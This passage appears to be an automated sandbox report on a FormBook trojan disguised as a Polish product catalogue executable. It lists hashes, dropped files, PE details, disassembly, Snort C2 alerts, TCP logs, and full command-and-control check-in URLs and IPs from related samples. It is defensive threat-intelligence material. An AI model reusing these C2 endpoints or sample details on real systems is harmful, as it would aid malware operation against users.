                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/2@11/9
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 31.3% (good quality ratio 28.4%)
                                                • Quality average: 73.6%
                                                • Quality standard deviation: 31.7%
                                                HCA Information:
                                                • Successful, ratio: 86%
                                                • Number of executed functions: 99
                                                • Number of non-executed functions: 85
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.49.150.241, 51.11.168.232
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, settingsfd-geo.trafficmanager.net
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                104.248.163.187#Uc81c#Ud488 #Uce74#Ud0c8#Ub85c#Uadf823.exeGet hashmaliciousBrowse
                                                • www.bezhantrading.com/wtcv/?jXF0i=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8jWB5TDN3B&E48PcH=s4SDBdZH
                                                EQ034989.exeGet hashmaliciousBrowse
                                                • www.bezhantrading.com/wtcv/?p8bLu=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8JJxJTHP/B&3fyTKn=C2MDbjTp
                                                cat#U00e1logo de productos2021.exeGet hashmaliciousBrowse
                                                • www.bezhantrading.com/wtcv/?8p=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8jWB5TDN3B&6lQL=e48to28xCrLPt0sP
                                                153.127.214.206EQ034989.exeGet hashmaliciousBrowse
                                                • www.harada-insatsu.com/wtcv/?p8bLu=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qws3oxF3Klxqa&3fyTKn=C2MDbjTp
                                                172.67.184.156EQ034989.exeGet hashmaliciousBrowse
                                                • www.affiliatemarketingproducts.xyz/wtcv/?p8bLu=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+v3fb5eH+BFz&3fyTKn=C2MDbjTp
                                                cat#U00e1logo de productos2021.exeGet hashmaliciousBrowse
                                                • www.affiliatemarketingproducts.xyz/wtcv/?8p=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+v31EJuH6DNz&6lQL=e48to28xCrLPt0sP
                                                217.160.0.33EQ034989.exeGet hashmaliciousBrowse
                                                • www.iccsukltd.com/wtcv/?p8bLu=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n/VdZfFb4jod&3fyTKn=C2MDbjTp

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                www.iccsukltd.comEQ034989.exeGet hashmaliciousBrowse
                                                • 217.160.0.33
                                                www.affiliatemarketingproducts.xyzEQ034989.exeGet hashmaliciousBrowse
                                                • 172.67.184.156
                                                cat#U00e1logo de productos2021.exeGet hashmaliciousBrowse
                                                • 172.67.184.156

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                SAKURA-ASAKURAInternetIncJPiSBX2z1os7.exeGet hashmaliciousBrowse
                                                • 153.126.211.112
                                                EQ034989.exeGet hashmaliciousBrowse
                                                • 153.127.214.206
                                                Port_UETQYDYA_99381,pdf.exeGet hashmaliciousBrowse
                                                • 133.242.249.12
                                                GF2QHRMI1tGet hashmaliciousBrowse
                                                • 153.127.220.234
                                                mirai.x86Get hashmaliciousBrowse
                                                • 153.120.181.224
                                                10xR6hubANGet hashmaliciousBrowse
                                                • 133.125.49.243
                                                1cG7fOkPjS.exeGet hashmaliciousBrowse
                                                • 153.127.214.165
                                                index_2021-09-21-20_06Get hashmaliciousBrowse
                                                • 153.120.48.218
                                                8U5snojV8p.exeGet hashmaliciousBrowse
                                                • 153.126.210.205
                                                W53ieNnm24Get hashmaliciousBrowse
                                                • 133.242.220.190
                                                LhMC14F4r6Get hashmaliciousBrowse
                                                • 133.242.202.122
                                                WR5MZql7vpGet hashmaliciousBrowse
                                                • 153.125.128.242
                                                ivMI3veipP.exeGet hashmaliciousBrowse
                                                • 153.127.71.68
                                                4dIxGwjniIGet hashmaliciousBrowse
                                                • 153.121.193.216
                                                8gQIIxr1sNGet hashmaliciousBrowse
                                                • 133.125.13.8
                                                o3ZUDIEL1vGet hashmaliciousBrowse
                                                • 153.127.220.238
                                                xwKdahKPn8.exeGet hashmaliciousBrowse
                                                • 153.126.211.112
                                                395d57a0_by_Libranalysis.exeGet hashmaliciousBrowse
                                                • 153.126.165.175
                                                QUOTE B1020363.PDF.exeGet hashmaliciousBrowse
                                                • 133.242.249.176
                                                TION.pdf.exeGet hashmaliciousBrowse
                                                • 133.242.249.176
                                                DIGITALOCEAN-ASNUSh3SFZEdlT0.dllGet hashmaliciousBrowse
                                                • 165.227.90.171
                                                61Wq3BOwiA.exeGet hashmaliciousBrowse
                                                • 188.166.46.127
                                                gXswKQATrt.dllGet hashmaliciousBrowse
                                                • 64.225.74.183
                                                #Uc81c#Ud488 #Uce74#Ud0c8#Ub85c#Uadf823.exeGet hashmaliciousBrowse
                                                • 104.248.163.187
                                                1oT4BWF7GlGet hashmaliciousBrowse
                                                • 206.189.84.209
                                                iSBX2z1os7.exeGet hashmaliciousBrowse
                                                • 165.227.252.190
                                                5FjM13QB8F.exeGet hashmaliciousBrowse
                                                • 46.101.121.244
                                                sora.x86Get hashmaliciousBrowse
                                                • 157.230.1.123
                                                fe0WPoEanmGet hashmaliciousBrowse
                                                • 206.189.51.168
                                                Hilix.armGet hashmaliciousBrowse
                                                • 45.55.195.228
                                                wt5i2fAcF0Get hashmaliciousBrowse
                                                • 167.99.122.255
                                                uohdbohpYbGet hashmaliciousBrowse
                                                • 139.59.170.186
                                                jygLuGmfJ2.exeGet hashmaliciousBrowse
                                                • 157.230.28.192
                                                rzMvWQOGAE.exeGet hashmaliciousBrowse
                                                • 165.22.84.147
                                                JSUAd0NPag.exeGet hashmaliciousBrowse
                                                • 157.230.28.192
                                                gqTrv5VEem.exeGet hashmaliciousBrowse
                                                • 159.89.128.13
                                                SecuriteInfo.com.Suspicious.Win32.Save.a.4727.dllGet hashmaliciousBrowse
                                                • 104.248.155.133
                                                SecuriteInfo.com.Suspicious.Win32.Save.a.31095.dllGet hashmaliciousBrowse
                                                • 104.248.155.133
                                                SecuriteInfo.com.Suspicious.Win32.Save.a.28634.dllGet hashmaliciousBrowse
                                                • 104.248.155.133
                                                SecuriteInfo.com.Suspicious.Win32.Save.a.12010.dllGet hashmaliciousBrowse
                                                • 104.248.155.133

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\hx6dizitwtz0f0aat
                                                Process:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):215803
                                                Entropy (8bit):7.994628213154947
                                                Encrypted:true
                                                SSDEEP:6144:1JIHtqEX3rWyncHSnlF1rYZYlz8gT6t+jGR:rwtbFncHc1cES+jGR
                                                MD5:61C9526BC0572C9F55C5C8A52AA67AC4
                                                SHA1:AAF907310F5A183328EC227BF2906F27574C55AB
                                                SHA-256:07AD9970509EAE7E01E04D18A115D789DF7670118F0A987F8A83270C42B6497A
                                                SHA-512:5542F3A7D19984BBF21940E64BC0C37D3ECE44942D7BECAD81F3F5E4E9180762E937A1AD3DB92EFF15F2440A0E65C09458B7D4397C2E77400E78FA1F39C205F6
                                                Malicious:false
                                                Reputation:low
                                                Preview: .'........|.....9a.v....^..]l.q.;/E=@W%.....-.......r).....[.WjN...YYt..V-..M.w.x...3.R....v_.7.....Y.k`.J..&..?..p..zge...'7x.t.v*M.g!.@,..Z..`..W8...I"4..A"....1...u.aQ{{#a...-"Z.......0.0.D.....RL.3..w39R......9.c.D.X.d.m.W.tdK.:...PR.JY...4:.qB...............xaxF...Q@Hnl.q.1/E.@W%...n.-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T....?..i.#a._.v".yG.\.V.0.0.D...X......s.........9..nD.J.d.=VW.tlK.4....R..Y...4:..B.......j.......xaaF...G@Hll.q.;/E=@W%.....-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T.....aQ{{#a.-".CG.\...0.0.D...X......w..R......9..nD.J.d.=VW.tlK.4....R..Y...4:..B.......j.......xaaF...G@Hll.q.;/E=@W%.....-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T.....aQ{{#a.-".CG.\...0.0.D...X......w..R......9..nD.J.d
                                                C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll
                                                Process:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):88064
                                                Entropy (8bit):6.428072489806541
                                                Encrypted:false
                                                SSDEEP:1536:coflsP2XNvIZy4K+PBtk7iHyX3SWzwQ9cIbUfs44UVxY2Qz:coOPkvLz+vk7Z+VxI
                                                MD5:CC4DEBEED38EA20DB5A0D2AFA03EFBEA
                                                SHA1:873E13909531B81E8B1DBDFBB8BC2AE317F73563
                                                SHA-256:6E7DC09D3A59CC7391C009BD8F8A70360CEBAFE87E817E44CD359A935DBF2617
                                                SHA-512:994E3BBB97B2B17C9A3A1DECBDB6FCEEBCA48F0384C85D568261736B42F3FF716AFA9A94511BEF5A4A2A1975651FE4F007EEC93C338381F596B47C1122658236
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 14%
                                                Reputation:low
                                                Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...P..a...........!................aG..............................................................................,2..L...x4......................................................................h...H...........(8...............................text............................... ..`.rdata..dX.......Z..................@..@.data...$E...P...$...2..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.512989604965828
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:nowy przyk#U0142adowy katalog.exe
                                                File size:422298
                                                MD5:cbe0e49106fad96b2c1c155ce5b22abd
                                                SHA1:25a9a38c80446b631fc1de30440caba41ff8ec74
                                                SHA256:a13cc23d40c93805a7305e090f5faf55d60b440e6d674ac333980ecd6c94bc60
                                                SHA512:013931e807edc454697dab78f81c54a3c1433970916ae2ca91dee03e03a04d1ae19b32eccd05fd44c5492a3b6c0c5080aeaaaba8329c5ca2b3cc39cb2c1c5f67
                                                SSDEEP:6144:68LxBzme9UeFrAmvGfHHolKxTcE0RAF1r1qzXRgT6t+jZadV1ACLSDBQqK07:c3eFrAmv1lQApm1wz2S+jZyr8K07
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                                File Icon

                                                Icon Hash:70c8d0e0ccd4f0d0

                                                Static PE Info

                                                General

                                                Entrypoint:0x40312a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebx
                                                mov dword ptr [esp+14h], 00409168h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B0h]
                                                call dword ptr [004070ACh]
                                                cmp ax, 00000006h
                                                je 00007FBC547D84F3h
                                                push ebx
                                                call 00007FBC547DB2D4h
                                                cmp eax, ebx
                                                je 00007FBC547D84E9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00407280h
                                                push esi
                                                call 00007FBC547DB250h
                                                push esi
                                                call dword ptr [00407108h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FBC547D84CDh
                                                push 0000000Dh
                                                call 00007FBC547DB2A8h
                                                push 0000000Bh
                                                call 00007FBC547DB2A1h
                                                mov dword ptr [0042EC24h], eax
                                                call dword ptr [00407038h]
                                                push ebx
                                                call dword ptr [0040726Ch]
                                                mov dword ptr [0042ECD8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 00429058h
                                                call dword ptr [0040715Ch]
                                                push 0040915Ch
                                                push 0042E420h
                                                call 00007FBC547DAED4h
                                                call dword ptr [0040710Ch]
                                                mov ebp, 00434000h
                                                push eax
                                                push ebp
                                                call 00007FBC547DAEC2h
                                                push ebx
                                                call dword ptr [00407144h]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x1fcb8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5e660x6000False0.670572916667data6.44065573436IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x12a20x1400False0.4455078125data5.0583287871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x25d180x600False0.458984375data4.18773476617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x370000x1fcb80x1fe00False0.38359375data5.99100948906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x372800x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                RT_ICON0x47aa80x6f7aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                RT_ICON0x4ea280x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x52c500x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x551f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x562a00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_DIALOG0x567080x100dataEnglishUnited States
                                                RT_DIALOG0x568080x11cdataEnglishUnited States
                                                RT_DIALOG0x569280x60dataEnglishUnited States
                                                RT_GROUP_ICON0x569880x5adataEnglishUnited States
                                                RT_MANIFEST0x569e80x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                Imports

                                                DLLImport
                                                KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                11/04/21-11:49:10.345950TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.6
                                                11/04/21-11:49:15.409408TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.634.102.136.180
                                                11/04/21-11:49:15.409408TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.634.102.136.180
                                                11/04/21-11:49:15.409408TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.634.102.136.180
                                                11/04/21-11:49:15.526365TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.6
                                                11/04/21-11:49:26.412220TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.6153.127.214.206
                                                11/04/21-11:49:26.412220TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.6153.127.214.206
                                                11/04/21-11:49:26.412220TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.6153.127.214.206

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 4, 2021 11:49:10.211590052 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.230325937 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:10.230520010 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.230787992 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.249495029 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:10.345949888 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:10.346048117 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:10.346096039 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.346160889 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.659367085 CET4976080192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:10.678026915 CET804976034.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.391933918 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.408896923 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.409070969 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.409408092 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.426412106 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.526365042 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.526426077 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:15.526756048 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.526823044 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.831765890 CET4976680192.168.2.634.102.136.180
                                                Nov 4, 2021 11:49:15.850500107 CET804976634.102.136.180192.168.2.6
                                                Nov 4, 2021 11:49:20.565169096 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.587682009 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:20.590507030 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.590734005 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.613791943 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:20.613830090 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:20.613846064 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:20.614064932 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.616709948 CET4977080192.168.2.6217.160.0.33
                                                Nov 4, 2021 11:49:20.639265060 CET8049770217.160.0.33192.168.2.6
                                                Nov 4, 2021 11:49:26.100131035 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:26.411873102 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:26.412035942 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:26.412220001 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:26.716120005 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:26.820693016 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:26.911021948 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:27.061523914 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:27.061583996 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:27.061712027 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:27.064249992 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:27.218399048 CET8049773153.127.214.206192.168.2.6
                                                Nov 4, 2021 11:49:27.219957113 CET4977380192.168.2.6153.127.214.206
                                                Nov 4, 2021 11:49:36.965390921 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:36.988444090 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:36.988626003 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:36.988871098 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:37.012037992 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:37.027247906 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:37.027307987 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:37.027590990 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:37.027663946 CET4977480192.168.2.6172.67.184.156
                                                Nov 4, 2021 11:49:37.050609112 CET8049774172.67.184.156192.168.2.6
                                                Nov 4, 2021 11:49:47.147589922 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.178508043 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.178898096 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.179642916 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.211309910 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.680707932 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.750653982 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.760755062 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.760783911 CET8049776104.248.163.187192.168.2.6
                                                Nov 4, 2021 11:49:47.760900974 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:47.760941982 CET4977680192.168.2.6104.248.163.187
                                                Nov 4, 2021 11:49:52.731015921 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.754976988 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:52.755201101 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.756943941 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.780973911 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:52.781173944 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:52.781208038 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:52.781493902 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.782634974 CET4977780192.168.2.646.38.243.234
                                                Nov 4, 2021 11:49:52.806570053 CET804977746.38.243.234192.168.2.6
                                                Nov 4, 2021 11:49:57.861294031 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.904347897 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:49:57.904489994 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.904726028 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.947076082 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:49:57.947346926 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:49:57.947367907 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:49:57.947566032 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.947731972 CET4977880192.168.2.6138.68.74.116
                                                Nov 4, 2021 11:49:57.989968061 CET8049778138.68.74.116192.168.2.6
                                                Nov 4, 2021 11:50:03.400053978 CET4977980192.168.2.635.246.6.109
